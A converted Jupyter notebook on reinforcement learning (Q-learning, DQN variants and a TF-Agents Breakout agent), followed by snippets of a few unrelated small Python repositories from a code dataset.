range(3)])\n\nhistory1 = np.array(history1) # Not shown\n\n\n# In[43]:\n\n\nQ_values\n\n\n# In[44]:\n\n\nnp.argmax(Q_values, axis=1)\n\n\n# The optimal policy for this MDP, when using a discount factor of 0.90, is to choose action a0 when in state s0, and choose action a0 when in state s1, and finally choose action a1 (the only possible action) when in state s2.\n\n# Let's try again with a discount factor of 0.95:\n\n# In[45]:\n\n\nQ_values = np.full((3, 3), -np.inf) # -np.inf for impossible actions\nfor state, actions in enumerate(possible_actions):\n Q_values[state, actions] = 0.0 # for all possible actions\n\n\n# In[46]:\n\n\ngamma = 0.95 # the discount factor\n\nfor iteration in range(50):\n Q_prev = Q_values.copy()\n for s in range(3):\n for a in possible_actions[s]:\n Q_values[s, a] = np.sum([\n transition_probabilities[s][a][sp]\n * (rewards[s][a][sp] + gamma * np.max(Q_prev[sp]))\n for sp in range(3)])\n\n\n# In[47]:\n\n\nQ_values\n\n\n# In[48]:\n\n\nnp.argmax(Q_values, axis=1)\n\n\n# Now the policy has changed! In state s1, we now prefer to go through the fire (choose action a2). This is because the discount factor is larger so the agent values the future more, and it is therefore ready to pay an immediate penalty in order to get more future rewards.\n\n# # Q-Learning\n\n# Q-Learning works by watching an agent play (e.g., randomly) and gradually improving its estimates of the Q-Values. Once it has accurate Q-Value estimates (or close enough), then the optimal policy consists in choosing the action that has the highest Q-Value (i.e., the greedy policy).\n\n# We will need to simulate an agent moving around in the environment, so let's define a function to perform some action and get the new state and a reward:\n\n# In[49]:\n\n\ndef step(state, action):\n probas = transition_probabilities[state][action]\n next_state = np.random.choice([0, 1, 2], p=probas)\n reward = rewards[state][action][next_state]\n return next_state, reward\n\n\n# We also need an exploration policy, which can be any policy, as long as it visits every possible state many times. We will just use a random policy, since the state space is very small:\n\n# In[50]:\n\n\ndef exploration_policy(state):\n return np.random.choice(possible_actions[state])\n\n\n# Now let's initialize the Q-Values like earlier, and run the Q-Learning algorithm:\n\n# In[51]:\n\n\nnp.random.seed(42)\n\nQ_values = np.full((3, 3), -np.inf)\nfor state, actions in enumerate(possible_actions):\n Q_values[state][actions] = 0\n\nalpha0 = 0.05 # initial learning rate\ndecay = 0.005 # learning rate decay\ngamma = 0.90 # discount factor\nstate = 0 # initial state\nhistory2 = [] # Not shown in the book\n\nfor iteration in range(10000):\n history2.append(Q_values.copy()) # Not shown\n action = exploration_policy(state)\n next_state, reward = step(state, action)\n next_value = np.max(Q_values[next_state]) # greedy policy at the next step\n alpha = alpha0 / (1 + iteration * decay)\n Q_values[state, action] *= 1 - alpha\n Q_values[state, action] += alpha * (reward + gamma * next_value)\n state = next_state\n\nhistory2 = np.array(history2) # Not shown\n\n\n# In[52]:\n\n\nQ_values\n\n\n# In[53]:\n\n\nnp.argmax(Q_values, axis=1) # optimal action for each state\n\n\n# In[54]:\n\n\ntrue_Q_value = history1[-1, 0, 0]\n\nfig, axes = plt.subplots(1, 2, figsize=(10, 4), sharey=True)\naxes[0].set_ylabel(\"Q-Value$(s_0, a_0)$\", fontsize=14)\naxes[0].set_title(\"Q-Value Iteration\", fontsize=14)\naxes[1].set_title(\"Q-Learning\", fontsize=14)\nfor ax, width, history in zip(axes, (50, 10000), (history1, history2)):\n ax.plot([0, width], [true_Q_value, true_Q_value], \"k--\")\n ax.plot(np.arange(width), history[:, 0, 0], \"b-\", linewidth=2)\n ax.set_xlabel(\"Iterations\", fontsize=14)\n ax.axis([0, width, 0, 24])\n\nsave_fig(\"q_value_plot\")\n\n\n# # Deep Q-Network\n\n# Let's build the DQN. Given a state, it will estimate, for each possible action, the sum of discounted future rewards it can expect after it plays that action (but before it sees its outcome):\n\n# In[55]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nenv = gym.make(\"CartPole-v1\")\ninput_shape = [4] # == env.observation_space.shape\nn_outputs = 2 # == env.action_space.n\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(32, activation=\"elu\", input_shape=input_shape),\n keras.layers.Dense(32, activation=\"elu\"),\n keras.layers.Dense(n_outputs)\n])\n\n\n# To select an action using this DQN, we just pick the action with the largest predicted Q-value. However, to ensure that the agent explores the environment, we choose a random action with probability `epsilon`.\n\n# In[56]:\n\n\ndef epsilon_greedy_policy(state, epsilon=0):\n if np.random.rand() < epsilon:\n return np.random.randint(2)\n else:\n Q_values = model.predict(state[np.newaxis])\n return np.argmax(Q_values[0])\n\n\n# We will also need a replay memory. It will contain the agent's experiences, in the form of tuples: `(obs, action, reward, next_obs, done)`. We can use the `deque` class for that:\n\n# In[57]:\n\n\nfrom collections import deque\n\nreplay_memory = deque(maxlen=2000)\n\n\n# And let's create a function to sample experiences from the replay memory. It will return 5 NumPy arrays: `[obs, actions, rewards, next_obs, dones]`.\n\n# In[58]:\n\n\ndef sample_experiences(batch_size):\n indices = np.random.randint(len(replay_memory), size=batch_size)\n batch = [replay_memory[index] for index in indices]\n states, actions, rewards, next_states, dones = [\n np.array([experience[field_index] for experience in batch])\n for field_index in range(5)]\n return states, actions, rewards, next_states, dones\n\n\n# Now we can create a function that will use the DQN to play one step, and record its experience in the replay memory:\n\n# In[59]:\n\n\ndef play_one_step(env, state, epsilon):\n action = epsilon_greedy_policy(state, epsilon)\n next_state, reward, done, info = env.step(action)\n replay_memory.append((state, action, reward, next_state, done))\n return next_state, reward, done, info\n\n\n# Lastly, let's create a function that will sample some experiences from the replay memory and perform a training step:\n\n# In[60]:\n\n\nbatch_size = 32\ndiscount_rate = 0.95\noptimizer = keras.optimizers.Adam(lr=1e-3)\nloss_fn = keras.losses.mean_squared_error\n\ndef training_step(batch_size):\n experiences = sample_experiences(batch_size)\n states, actions, rewards, next_states, dones = experiences\n next_Q_values = model.predict(next_states)\n max_next_Q_values = np.max(next_Q_values, axis=1)\n target_Q_values = rewards + (1 - dones) * discount_rate * max_next_Q_values\n mask = tf.one_hot(actions, n_outputs)\n with tf.GradientTape() as tape:\n all_Q_values = model(states)\n Q_values = tf.reduce_sum(all_Q_values * mask, axis=1, keepdims=True)\n loss = tf.reduce_mean(loss_fn(target_Q_values, Q_values))\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\n# And now, let's train the model!\n\n# In[61]:\n\n\nenv.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nrewards = [] \nbest_score = 0\n\n\n# In[62]:\n\n\nfor episode in range(600):\n obs = env.reset() \n for step in range(200):\n epsilon = max(1 - episode / 500, 0.01)\n obs, reward, done, info = play_one_step(env, obs, epsilon)\n if done:\n break\n rewards.append(step) # Not shown in the book\n if step > best_score: # Not shown\n best_weights = model.get_weights() # Not shown\n best_score = step # Not shown\n print(\"\\rEpisode: {}, Steps: {}, eps: {:.3f}\".format(episode, step + 1, epsilon), end=\"\") # Not shown\n if episode > 50:\n training_step(batch_size)\n\nmodel.set_weights(best_weights)\n\n\n# In[63]:\n\n\nplt.figure(figsize=(8, 4))\nplt.plot(rewards)\nplt.xlabel(\"Episode\", fontsize=14)\nplt.ylabel(\"Sum of rewards\", fontsize=14)\nsave_fig(\"dqn_rewards_plot\")\nplt.show()\n\n\n# In[64]:\n\n\nenv.seed(42)\nstate = env.reset()\n\nframes = []\n\nfor step in range(200):\n action = epsilon_greedy_policy(state)\n state, reward, done, info = env.step(action)\n if done:\n break\n img = env.render(mode=\"rgb_array\")\n frames.append(img)\n \nplot_animation(frames)\n\n\n# Not bad at all!\n\n# ## Double DQN\n\n# In[65]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(32, activation=\"elu\", input_shape=[4]),\n keras.layers.Dense(32, activation=\"elu\"),\n keras.layers.Dense(n_outputs)\n])\n\ntarget = keras.models.clone_model(model)\ntarget.set_weights(model.get_weights())\n\n\n# In[66]:\n\n\nbatch_size = 32\ndiscount_rate = 0.95\noptimizer = keras.optimizers.Adam(lr=1e-3)\nloss_fn = keras.losses.Huber()\n\ndef training_step(batch_size):\n experiences = sample_experiences(batch_size)\n states, actions, rewards, next_states, dones = experiences\n next_Q_values = model.predict(next_states)\n best_next_actions = np.argmax(next_Q_values, axis=1)\n next_mask = tf.one_hot(best_next_actions, n_outputs).numpy()\n next_best_Q_values = (target.predict(next_states) * next_mask).sum(axis=1)\n target_Q_values = rewards + (1 - dones) * discount_rate * next_best_Q_values\n mask = tf.one_hot(actions, n_outputs)\n with tf.GradientTape() as tape:\n all_Q_values = model(states)\n Q_values = tf.reduce_sum(all_Q_values * mask, axis=1, keepdims=True)\n loss = tf.reduce_mean(loss_fn(target_Q_values, Q_values))\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\n# In[67]:\n\n\nreplay_memory = deque(maxlen=2000)\n\n\n# In[68]:\n\n\nenv.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nrewards = []\nbest_score = 0\n\nfor episode in range(600):\n obs = env.reset() \n for step in range(200):\n epsilon = max(1 - episode / 500, 0.01)\n obs, reward, done, info = play_one_step(env, obs, epsilon)\n if done:\n break\n rewards.append(step)\n if step > best_score:\n best_weights = model.get_weights()\n best_score = step\n print(\"\\rEpisode: {}, Steps: {}, eps: {:.3f}\".format(episode, step + 1, epsilon), end=\"\")\n if episode > 50:\n training_step(batch_size)\n if episode % 50 == 0:\n target.set_weights(model.get_weights())\n # Alternatively, you can do soft updates at each step:\n #if episode > 50:\n #target_weights = target.get_weights()\n #online_weights = model.get_weights()\n #for index in range(len(target_weights)):\n # target_weights[index] = 0.99 * target_weights[index] + 0.01 * target_weights[index]\n #target.set_weights(target_weights)\n\nmodel.set_weights(best_weights)\n\n\n# In[69]:\n\n\nplt.figure(figsize=(8, 4))\nplt.plot(rewards)\nplt.xlabel(\"Episode\", fontsize=14)\nplt.ylabel(\"Sum of rewards\", fontsize=14)\nsave_fig(\"double_dqn_rewards_plot\")\nplt.show()\n\n\n# In[70]:\n\n\nenv.seed(42)\nstate = env.reset()\n\nframes = []\n\nfor step in range(200):\n action = epsilon_greedy_policy(state)\n state, reward, done, info = env.step(action)\n if done:\n break\n img = env.render(mode=\"rgb_array\")\n frames.append(img)\n \nplot_animation(frames)\n\n\n# # Dueling Double DQN\n\n# In[71]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nK = keras.backend\ninput_states = keras.layers.Input(shape=[4])\nhidden1 = keras.layers.Dense(32, activation=\"elu\")(input_states)\nhidden2 = keras.layers.Dense(32, activation=\"elu\")(hidden1)\nstate_values = keras.layers.Dense(1)(hidden2)\nraw_advantages = keras.layers.Dense(n_outputs)(hidden2)\nadvantages = raw_advantages - K.max(raw_advantages, axis=1, keepdims=True)\nQ_values = state_values + advantages\nmodel = keras.models.Model(inputs=[input_states], outputs=[Q_values])\n\ntarget = keras.models.clone_model(model)\ntarget.set_weights(model.get_weights())\n\n\n# In[72]:\n\n\nbatch_size = 32\ndiscount_rate = 0.95\noptimizer = keras.optimizers.Adam(lr=1e-2)\nloss_fn = keras.losses.Huber()\n\ndef training_step(batch_size):\n experiences = sample_experiences(batch_size)\n states, actions, rewards, next_states, dones = experiences\n next_Q_values = model.predict(next_states)\n best_next_actions = np.argmax(next_Q_values, axis=1)\n next_mask = tf.one_hot(best_next_actions, n_outputs).numpy()\n next_best_Q_values = (target.predict(next_states) * next_mask).sum(axis=1)\n target_Q_values = rewards + (1 - dones) * discount_rate * next_best_Q_values\n mask = tf.one_hot(actions, n_outputs)\n with tf.GradientTape() as tape:\n all_Q_values = model(states)\n Q_values = tf.reduce_sum(all_Q_values * mask, axis=1, keepdims=True)\n loss = tf.reduce_mean(loss_fn(target_Q_values, Q_values))\n grads = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n\n# In[73]:\n\n\nreplay_memory = deque(maxlen=2000)\n\n\n# In[74]:\n\n\nenv.seed(42)\nnp.random.seed(42)\ntf.random.set_seed(42)\n\nrewards = []\nbest_score = 0\n\nfor episode in range(600):\n obs = env.reset() \n for step in range(200):\n epsilon = max(1 - episode / 500, 0.01)\n obs, reward, done, info = play_one_step(env, obs, epsilon)\n if done:\n break\n rewards.append(step)\n if step > best_score:\n best_weights = model.get_weights()\n best_score = step\n print(\"\\rEpisode: {}, Steps: {}, eps: {:.3f}\".format(episode, step + 1, epsilon), end=\"\")\n if episode > 50:\n training_step(batch_size)\n if episode % 200 == 0:\n target.set_weights(model.get_weights())\n\nmodel.set_weights(best_weights)\n\n\n# In[75]:\n\n\nplt.plot(rewards)\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Sum of rewards\")\nplt.show()\n\n\n# In[76]:\n\n\nenv.seed(42)\nstate = env.reset()\n\nframes = []\n\nfor step in range(200):\n action = epsilon_greedy_policy(state)\n state, reward, done, info = env.step(action)\n if done:\n break\n img = env.render(mode=\"rgb_array\")\n frames.append(img)\n \nplot_animation(frames)\n\n\n# This looks like a pretty robust agent!\n\n# In[77]:\n\n\nenv.close()\n\n\n# # Using TF-Agents to Beat Breakout\n\n# Let's use TF-Agents to create an agent that will learn to play Breakout. We will use the Deep Q-Learning algorithm, so you can easily compare the components with the previous implementation, but TF-Agents implements many other (and more sophisticated) algorithms!\n\n# ## TF-Agents Environments\n\n# In[78]:\n\n\ntf.random.set_seed(42)\nnp.random.seed(42)\n\n\n# In[79]:\n\n\nfrom tf_agents.environments import suite_gym\n\nenv = suite_gym.load(\"Breakout-v4\")\nenv\n\n\n# In[80]:\n\n\nenv.gym\n\n\n# In[81]:\n\n\nenv.seed(42)\nenv.reset()\n\n\n# In[82]:\n\n\nenv.step(1) # Fire\n\n\n# In[83]:\n\n\nimg = env.render(mode=\"rgb_array\")\n\nplt.figure(figsize=(6, 8))\nplt.imshow(img)\nplt.axis(\"off\")\nsave_fig(\"breakout_plot\")\nplt.show()\n\n\n# In[84]:\n\n\nenv.current_time_step()\n\n\n# ## Environment Specifications\n\n# In[85]:\n\n\nenv.observation_spec()\n\n\n# In[86]:\n\n\nenv.action_spec()\n\n\n# In[87]:\n\n\nenv.time_step_spec()\n\n\n# ## Environment Wrappers\n\n# You can wrap a TF-Agents environments in a TF-Agents wrapper:\n\n# In[88]:\n\n\nfrom tf_agents.environments.wrappers import ActionRepeat\n\nrepeating_env = ActionRepeat(env, times=4)\nrepeating_env\n\n\n# In[89]:\n\n\nrepeating_env.unwrapped\n\n\n# Here is the list of available wrappers:\n\n# In[90]:\n\n\nimport tf_agents.environments.wrappers\n\nfor name in dir(tf_agents.environments.wrappers):\n obj = getattr(tf_agents.environments.wrappers, name)\n if hasattr(obj, \"__base__\") and issubclass(obj, tf_agents.environments.wrappers.PyEnvironmentBaseWrapper):\n print(\"{:27s} {}\".format(name, obj.__doc__.split(\"\\n\")[0]))\n\n\n# The `suite_gym.load()` function can create an env and wrap it for you, both with TF-Agents environment wrappers and Gym environment wrappers (the latter are applied first).\n\n# In[91]:\n\n\nfrom functools import partial\nfrom gym.wrappers import TimeLimit\n\nlimited_repeating_env = suite_gym.load(\n \"Breakout-v4\",\n gym_env_wrappers=[partial(TimeLimit, max_episode_steps=10000)],\n env_wrappers=[partial(ActionRepeat, times=4)],\n)\n\n\n# In[92]:\n\n\nlimited_repeating_env\n\n\n# Create an Atari Breakout environment, and wrap it to apply the default Atari preprocessing steps:\n\n# In[93]:\n\n\nlimited_repeating_env.unwrapped\n\n\n# In[94]:\n\n\nfrom tf_agents.environments import suite_atari\nfrom tf_agents.environments.atari_preprocessing import AtariPreprocessing\nfrom tf_agents.environments.atari_wrappers import FrameStack4\n\nmax_episode_steps = 27000 # <=> 108k ALE frames since 1 step = 4 frames\nenvironment_name = \"BreakoutNoFrameskip-v4\"\n\nenv = suite_atari.load(\n environment_name,\n max_episode_steps=max_episode_steps,\n gym_env_wrappers=[AtariPreprocessing, FrameStack4])\n\n\n# In[95]:\n\n\nenv\n\n\n# Play a few steps just to see what happens:\n\n# In[96]:\n\n\nenv.seed(42)\nenv.reset()\ntime_step = env.step(1) # FIRE\nfor _ in range(4):\n time_step = env.step(3) # LEFT\n\n\n# In[97]:\n\n\ndef plot_observation(obs):\n # Since there are only 3 color channels, you cannot display 4 frames\n # with one primary color per frame. So this code computes the delta between\n # the current frame and the mean of the other frames, and it adds this delta\n # to the red and blue channels to get a pink color for the current frame.\n obs = obs.astype(np.float32)\n img = obs[..., :3]\n current_frame_delta = np.maximum(obs[..., 3] - obs[..., :3].mean(axis=-1), 0.)\n img[..., 0] += current_frame_delta\n img[..., 2] += current_frame_delta\n img = np.clip(img / 150, 0, 1)\n plt.imshow(img)\n plt.axis(\"off\")\n\n\n# In[98]:\n\n\nplt.figure(figsize=(6, 6))\nplot_observation(time_step.observation)\nsave_fig(\"preprocessed_breakout_plot\")\nplt.show()\n\n\n# Convert the Python environment to a TF environment:\n\n# In[99]:\n\n\nfrom tf_agents.environments.tf_py_environment import TFPyEnvironment\n\ntf_env = TFPyEnvironment(env)\n\n\n# ## Creating the DQN\n\n# Create a small class to normalize the observations. Images are stored using bytes from 0 to 255 to use less RAM, but we want to pass floats from 0.0 to 1.0 to the neural network:\n\n# Create the Q-Network:\n\n# In[100]:\n\n\nfrom tf_agents.networks.q_network import QNetwork\n\npreprocessing_layer = keras.layers.Lambda(\n lambda obs: tf.cast(obs, np.float32) / 255.)\nconv_layer_params=[(32, (8, 8), 4), (64, (4, 4), 2), (64, (3, 3), 1)]\nfc_layer_params=[512]\n\nq_net = QNetwork(\n tf_env.observation_spec(),\n tf_env.action_spec(),\n preprocessing_layers=preprocessing_layer,\n conv_layer_params=conv_layer_params,\n fc_layer_params=fc_layer_params)\n\n\n# Create the DQN Agent:\n\n# In[101]:\n\n\nfrom tf_agents.agents.dqn.dqn_agent import DqnAgent\n\n# see TF-agents issue #113\n#optimizer = keras.optimizers.RMSprop(lr=2.5e-4, rho=0.95, momentum=0.0,\n# epsilon=0.00001, centered=True)\n\ntrain_step = tf.Variable(0)\nupdate_period = 4 # run a training step every 4 collect steps\noptimizer = tf.compat.v1.train.RMSPropOptimizer(learning_rate=2.5e-4, decay=0.95, momentum=0.0,\n epsilon=0.00001, centered=True)\nepsilon_fn = keras.optimizers.schedules.PolynomialDecay(\n initial_learning_rate=1.0, # initial ε\n decay_steps=250000 // update_period, # <=> 1,000,000 ALE frames\n end_learning_rate=0.01) # final ε\nagent = DqnAgent(tf_env.time_step_spec(),\n tf_env.action_spec(),\n q_network=q_net,\n optimizer=optimizer,\n target_update_period=2000, # <=> 32,000 ALE frames\n td_errors_loss_fn=keras.losses.Huber(reduction=\"none\"),\n gamma=0.99, # discount factor\n train_step_counter=train_step,\n epsilon_greedy=lambda: epsilon_fn(train_step))\nagent.initialize()\n\n\n# Create the replay buffer:\n\n# In[102]:\n\n\nfrom tf_agents.replay_buffers import tf_uniform_replay_buffer\n\nreplay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(\n data_spec=agent.collect_data_spec,\n batch_size=tf_env.batch_size,\n max_length=1000000)\n\nreplay_buffer_observer = replay_buffer.add_batch\n\n\n# Create a simple custom observer that counts and displays the number of times it is called (except when it is passed a trajectory that represents the boundary between two episodes, as this does not count as a step):\n\n# In[103]:\n\n\nclass ShowProgress:\n def __init__(self, total):\n self.counter = 0\n self.total = total\n def __call__(self, trajectory):\n if not trajectory.is_boundary():\n self.counter += 1\n if self.counter % 100 == 0:\n print(\"\\r{}/{}\".format(self.counter, self.total), end=\"\")\n\n\n# Let's add some training metrics:\n\n# In[104]:\n\n\nfrom tf_agents.metrics import tf_metrics\n\ntrain_metrics = [\n tf_metrics.NumberOfEpisodes(),\n tf_metrics.EnvironmentSteps(),\n tf_metrics.AverageReturnMetric(),\n tf_metrics.AverageEpisodeLengthMetric(),\n]\n\n\n# In[105]:\n\n\ntrain_metrics[0].result()\n\n\n# In[106]:\n\n\nfrom tf_agents.eval.metric_utils import log_metrics\nimport logging\nlogging.getLogger().setLevel(logging.INFO)\nlog_metrics(train_metrics)\n\n\n# Create the collect driver:\n\n# In[107]:\n\n\nfrom tf_agents.drivers.dynamic_step_driver import DynamicStepDriver\n\ncollect_driver = DynamicStepDriver(\n tf_env,\n agent.collect_policy,\n observers=[replay_buffer_observer] + train_metrics,\n num_steps=update_period) # collect 4 steps for each training iteration\n\n\n# Collect the initial experiences, before training:\n\n# In[108]:\n\n\nfrom tf_agents.policies.random_tf_policy import RandomTFPolicy\n\ninitial_collect_policy = RandomTFPolicy(tf_env.time_step_spec(),\n tf_env.action_spec())\ninit_driver = DynamicStepDriver(\n tf_env,\n initial_collect_policy,\n observers=[replay_buffer.add_batch, ShowProgress(20000)],\n num_steps=20000) # <=> 80,000 ALE frames\nfinal_time_step, final_policy_state = init_driver.run()\n\n\n# Let's sample 2 sub-episodes, with 3 time steps each and display them:\n\n# In[109]:\n\n\ntf.random.set_seed(888) # chosen to show an example of trajectory at the end of an episode\n\ntrajectories, buffer_info = replay_buffer.get_next(\n sample_batch_size=2, num_steps=3)\n\n\n# In[110]:\n\n\ntrajectories._fields\n\n\n# In[111]:\n\n\ntrajectories.observation.shape\n\n\n# In[112]:\n\n\nfrom tf_agents.trajectories.trajectory import to_transition\n\ntime_steps, action_steps, next_time_steps = to_transition(trajectories)\ntime_steps.observation.shape\n\n\n# In[113]:\n\n\ntrajectories.step_type.numpy()\n\n\n# In[114]:\n\n\nplt.figure(figsize=(10, 6.8))\nfor row in range(2):\n for col in range(3):\n plt.subplot(2, 3, row * 3 + col + 1)\n plot_observation(trajectories.observation[row, col].numpy())\nplt.subplots_adjust(left=0, right=1, bottom=0, top=1, hspace=0, wspace=0.02)\nsave_fig(\"sub_episodes_plot\")\nplt.show()\n\n\n# Now let's create the dataset:\n\n# In[115]:\n\n\ndataset = replay_buffer.as_dataset(\n sample_batch_size=64,\n num_steps=2,\n num_parallel_calls=3).prefetch(3)\n\n\n# Convert the main functions to TF Functions for better performance:\n\n# In[116]:\n\n\nfrom tf_agents.utils.common import function\n\ncollect_driver.run = function(collect_driver.run)\nagent.train = function(agent.train)\n\n\n# And now we are ready to run the main loop!\n\n# In[117]:\n\n\ndef train_agent(n_iterations):\n time_step = None\n policy_state = agent.collect_policy.get_initial_state(tf_env.batch_size)\n iterator = iter(dataset)\n for iteration in range(n_iterations):\n time_step, policy_state = collect_driver.run(time_step, policy_state)\n trajectories, buffer_info = next(iterator)\n train_loss = agent.train(trajectories)\n print(\"\\r{} loss:{:.5f}\".format(\n iteration, train_loss.loss.numpy()), end=\"\")\n if iteration % 1000 == 0:\n log_metrics(train_metrics)\n\n\n# Run the next cell to train the agent for 10,000 steps. Then look at its behavior by running the following cell. You can run these two cells as many times as you wish. The agent will keep improving!\n\n# In[118]:\n\n\ntrain_agent(n_iterations=10000)\n\n\n# In[119]:\n\n\nframes = []\ndef save_frames(trajectory):\n global frames\n frames.append(tf_env.pyenv.envs[0].render(mode=\"rgb_array\"))\n\nprev_lives = tf_env.pyenv.envs[0].ale.lives()\ndef reset_and_fire_on_life_lost(trajectory):\n global prev_lives\n lives = tf_env.pyenv.envs[0].ale.lives()\n if prev_lives != lives:\n tf_env.reset()\n tf_env.pyenv.envs[0].step(1)\n prev_lives = lives\n\nwatch_driver = DynamicStepDriver(\n tf_env,\n agent.policy,\n observers=[save_frames, reset_and_fire_on_life_lost, ShowProgress(1000)],\n num_steps=1000)\nfinal_time_step, final_policy_state = watch_driver.run()\n\nplot_animation(frames)\n\n\n# If you want to save an animated GIF to show off your agent to your friends, here's one way to do it:\n\n# In[120]:\n\n\nimport PIL\n\nimage_path = os.path.join(\"images\", \"rl\", \"breakout.gif\")\nframe_images = [PIL.Image.fromarray(frame) for frame in frames[:150]]\nframe_images[0].save(image_path, format='GIF',\n append_images=frame_images[1:],\n save_all=True,\n duration=30,\n loop=0)\n\n\n# In[121]:\n\n\nget_ipython().run_cell_magic('html', '', '')\n\n\n# # Extra material\n\n# ## Deque vs rotating list\n\n# The `deque` class offers fast append, but fairly slow random access (for large replay memories):\n\n# In[122]:\n\n\nfrom collections import deque\nnp.random.seed(42)\n\nmem = deque(maxlen=1000000)\nfor i in range(1000000):\n mem.append(i)\n[mem[i] for i in np.random.randint(1000000, size=5)]\n\n\n# In[123]:\n\n\nget_ipython().run_line_magic('timeit', 'mem.append(1)')\n\n\n# In[124]:\n\n\nget_ipython().run_line_magic('timeit', '[mem[i] for i in np.random.randint(1000000, size=5)]')\n\n\n# Alternatively, you could use a rotating list like this `ReplayMemory` class. This would make random access faster for large replay memories:\n\n# In[125]:\n\n\nclass ReplayMemory:\n def __init__(self, max_size):\n self.buffer = np.empty(max_size, dtype=np.object)\n self.max_size = max_size\n self.index = 0\n self.size = 0\n\n def append(self, obj):\n self.buffer[self.index] = obj\n self.size = min(self.size + 1, self.max_size)\n self.index = (self.index + 1) % self.max_size\n\n def sample(self, batch_size):\n indices = np.random.randint(self.size, size=batch_size)\n return self.buffer[indices]\n\n\n# In[126]:\n\n\nmem = ReplayMemory(max_size=1000000)\nfor i in range(1000000):\n mem.append(i)\nmem.sample(5)\n\n\n# In[127]:\n\n\nget_ipython().run_line_magic('timeit', 'mem.append(1)')\n\n\n# In[128]:\n\n\nget_ipython().run_line_magic('timeit', 'mem.sample(5)')\n\n\n# ## Creating a Custom TF-Agents Environment\n\n# To create a custom TF-Agent environment, you just need to write a class that inherits from the `PyEnvironment` class and implements a few methods. For example, the following minimal environment represents a simple 4x4 grid. The agent starts in one corner (0,0) and must move to the opposite corner (3,3). The episode is done if the agent reaches the goal (it gets a +10 reward) or if the agent goes out of bounds (-1 reward). The actions are up (0), down (1), left (2) and right (3).\n\n# In[129]:\n\n\nclass MyEnvironment(tf_agents.environments.py_environment.PyEnvironment):\n def __init__(self, discount=1.0):\n super().__init__()\n self._action_spec = tf_agents.specs.BoundedArraySpec(\n shape=(), dtype=np.int32, name=\"action\", minimum=0, maximum=3)\n self._observation_spec = tf_agents.specs.BoundedArraySpec(\n shape=(4, 4), dtype=np.int32, name=\"observation\", minimum=0, maximum=1)\n self.discount = discount\n\n def action_spec(self):\n return self._action_spec\n\n def observation_spec(self):\n return self._observation_spec\n\n def _reset(self):\n self._state = np.zeros(2, dtype=np.int32)\n obs = np.zeros((4, 4), dtype=np.int32)\n obs[self._state[0], self._state[1]] = 1\n return tf_agents.trajectories.time_step.restart(obs)\n\n def _step(self, action):\n self._state += [(-1, 0), (+1, 0), (0, -1), (0, +1)][action]\n reward = 0\n obs = np.zeros((4, 4), dtype=np.int32)\n done = (self._state.min() < 0 or self._state.max() > 3)\n if not done:\n obs[self._state[0], self._state[1]] = 1\n if done or np.all(self._state == np.array([3, 3])):\n reward = -1 if done else +10\n return tf_agents.trajectories.time_step.termination(obs, reward)\n else:\n return tf_agents.trajectories.time_step.transition(obs, reward,\n self.discount)\n\n\n# The action and observation specs will generally be instances of the `ArraySpec` or `BoundedArraySpec` classes from the `tf_agents.specs` package (check out the other specs in this package as well). Optionally, you can also define a `render()` method, a `close()` method to free resources, as well as a `time_step_spec()` method if you don't want the `reward` and `discount` to be 32-bit float scalars. Note that the base class takes care of keeping track of the current time step, which is why we must implement `_reset()` and `_step()` rather than `reset()` and `step()`.\n# \n\n# In[130]:\n\n\nmy_env = MyEnvironment()\ntime_step = my_env.reset()\ntime_step\n\n\n# In[131]:\n\n\ntime_step = my_env.step(1)\ntime_step\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"wilsonify/tensorflow-examples","sub_path":"src/tensorflow-examples/tensorflow_examples/converted_notebooks/18_reinforcement_learning.py","file_name":"18_reinforcement_learning.py","file_ext":"py","file_size_in_byte":51651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"23213032864","text":"PLACEHOLDER = \"[Name]\"\n# with open(\"data.txt\") as f_data:\n# f_data.readline()\n\n\nwith open(\"name.txt\") as rd:\n name_list = rd.readlines()\n\nwith open(\"data.txt\") as rd_data:\n Letter_content = rd_data.read()\n for name in name_list:\n n_name = name.strip()\n new_letter = Letter_content.replace(PLACEHOLDER, n_name)\n with open(f\"./data/{n_name}.txt\", mode=\"w\") as new_name:\n new_name.write(new_letter)","repo_name":"farrukh-hamayoun/Mail_Merger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"36724184722","text":"def add(a, b=0):\n '''\n 两个数字相加,a , b ddff\n '''\n print(a,b)\n return a+b\n\n\nadd(2, 1)\nadd(1)\n\n#def foo(val, lst=[]):\n# lst.append(val)\n# return lst\n\n#改写\ndef foo(val, lst=None):\n if lst == None:\n lst = []\n lst.append(val)\n return lst\n \nlist1 = foo(10)\nprint(list1)\nlist2 = foo(123, [])\nprint(list2)\nlist3 = foo('a')\nprint(list3)\n\n","repo_name":"wzgdavid/python_kecheng","sub_path":"samples/history/BDA2/day3/huigu.py","file_name":"huigu.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"37038147980","text":"from aiogram import Bot, Dispatcher\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.utils import executor\n\nfrom architecture.achitecture import StateArchitecture\nfrom config import TOKEN\nfrom db import DataBase\nfrom services.analyzer import Analyzer\n\n\nclass TelegramBot:\n token = TOKEN\n connection = DataBase()\n \n def __init__(self):\n self.bot = Bot(token=self.token)\n self.dispatcher = Dispatcher(self.bot, storage=MemoryStorage())\n self.analyzer = Analyzer()\n self.architecture = StateArchitecture(self.bot, self.connection, self.dispatcher, self.analyzer)\n\n async def on_startup(self, dispatcher):\n 